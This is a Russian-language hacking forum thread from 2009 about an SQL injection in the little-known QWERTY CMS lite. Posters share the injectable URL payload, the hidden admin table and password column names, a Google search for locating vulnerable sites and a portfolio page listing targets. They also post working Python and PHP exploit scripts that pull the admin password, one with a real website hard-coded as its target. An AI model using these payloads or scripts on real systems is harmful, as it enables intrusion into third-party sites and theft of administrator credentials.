ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

QWERTY CMS lite - SQL INJ
  #1  
Старый 18.02.2009, 22:37
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585

Репутация: 818


Отправить сообщение для b3 с помощью ICQ
По умолчанию QWERTY CMS lite - SQL INJ


Нашел уязвимость SQL INJ в одной малоизвестной QWERTY CMS lite. В гугле даже несмог найти авторов сего творения.
Уязвимость в файле index.php, уязвимый параметр id:
Цитата:
index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,5
Таблица администратора:rkh8t5po
клонки:
secret873ktlW
pass459khyf

Пароль от админки находится в колонке pass459khyf Логин: admin
Путь к Админке:
/admin/
http://www.milw0rm.com/exploits/8104

Последний раз редактировалось b3; 25.02.2009 в 23:55..
 
Ответить с цитированием

  #2  
Старый 19.02.2009, 01:37
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

http://www.google.ru/search?q=allinurl%3A+php%3Fact%3Dpubl%26id%3D&ie=u tf-8&oe=utf-8&aq=t&rls=org.mozilla:rufficial&client=firefo x-a

Да уж -) совсем мало популярная..
 
Ответить с цитированием

qwerty cms expl01t
  #3  
Старый 24.02.2009, 23:58
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию qwerty cms expl01t

Код:
#!/usr/bin/python
#QWERTY CMS expl01t
#http://sql.parsers.info
#faza02[at]gmail[dot]com
#thx login999

import urllib
import re
print "qwerty cms expl01t by faza02\n\nexample: site.com"
site=raw_input(u'site: ')
site1='http://' + site + '/index.php?act=publ&id=38+and+0+UNION+SELECT+1,unhex(hex(pass459khyf)),3,4,5+from+rkh8t5po'

pars=str(urllib.urlopen(site1).read())
title=re.findall(r'\<title\>.*?\<\/title\>',pars)
per=str(title)[2:-2]
per=per.replace('<title>','')
per=per.replace('</title>','')
print 'login: admin' 
print 'passw0rd: ' + per
(с) faza02

Последний раз редактировалось faza02; 25.02.2009 в 00:01..
 
Ответить с цитированием

QWERTY CMS lite PHP Injector by mailbrush
  #4  
Старый 25.02.2009, 01:22
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию QWERTY CMS lite PHP Injector by mailbrush

QWERTY CMS lite PHP Injector by mailbrush
PHP код:
<?
$site
="http://dr-gng.dp.ua"//сайт для инжекта
function db($url){
    
$url=$url."/index.php?act=publ&id=-9+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5";
    
$fp=file_get_contents($url);
    list(
$ds,$f)=explode('<title>',$fp);
    list(
$ds,$f)=explode('</title>',$f);
    return 
$ds;
}

function 
user($url){
    
$url=$url."/index.php?act=publ&id=-9+union+select+1,concat(0x61646d696e3a,pass459khyf),3,4,5+from+rkh8t5po";
    
$fp=file_get_contents($url);
    list(
$ds,$f)=explode('<title>',$fp);
    list(
$ds,$f)=explode('</title>',$f);
    return 
$ds;
}

echo 
"<b>user():database():version() - </b>".db($site)."<br>";
echo 
"<b>admin:pass - </b>".user($site)."<br>";
?>
 
Ответить с цитированием

  #5  
Старый 25.02.2009, 02:21
login999
Постоянный
Регистрация: 12.06.2008
Сообщений: 654
Провел на форуме:
4512757

Репутация: 973


По умолчанию

Это ж все зависит от того, как писать, можно то его и на socket написать , а толку ? Python славится невьебённым количеством модулей, можешь взглянуть здесь :
http://docs.python.org/modindex.html , этот код можно было написать на как минимум трех модулях, причем аобсолютно без проблем
P.S.
Переделал код в духе минимализма :
Код:
#!/usr/bin/python
#QWERTY CMS expl01t
#http://sql.parsers.info
#faza02[at]gmail[dot]com
#thx login999
import urllib, re
print "qwerty cms expl01t by faza02\n\nexample: site.com"
print 'login: admin & passw0rd: ' + str(re.findall(r'\<title\>.*?\<\/title\>',str(urllib.urlopen("http://" + raw_input(u'site: ') + "/index.php?act=publ&id=38+and+0+UNION+SELECT+1,unhex(hex(pass459khyf)),3,4,5+from+rkh8t5po").read())))[2:-2].replace("<title>",'').replace("</title>",'')
Из 8 строчек кода 4 строчки - цоперайты
P.S. Ачат "обезвреживает" спец символы, поэтому в сплоенте после (pass459khyf)) не должно быть 2 пробела, снесите их нафик

Последний раз редактировалось login999; 25.02.2009 в 02:33..
 
Ответить с цитированием

  #6  
Старый 25.02.2009, 17:04
Glazz
Участник форума
Регистрация: 09.08.2008
Сообщений: 139
Провел на форуме:
560332

Репутация: 15
По умолчанию

Портфолио их групы , там адресочки можно взять, но спосов Assembler то же норм.
http://web-sites.kiev.ua/portfolio.php

А там реально ип админку отправляется при не праивльном заходе в админку?

Последний раз редактировалось Glazz; 25.02.2009 в 17:10..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ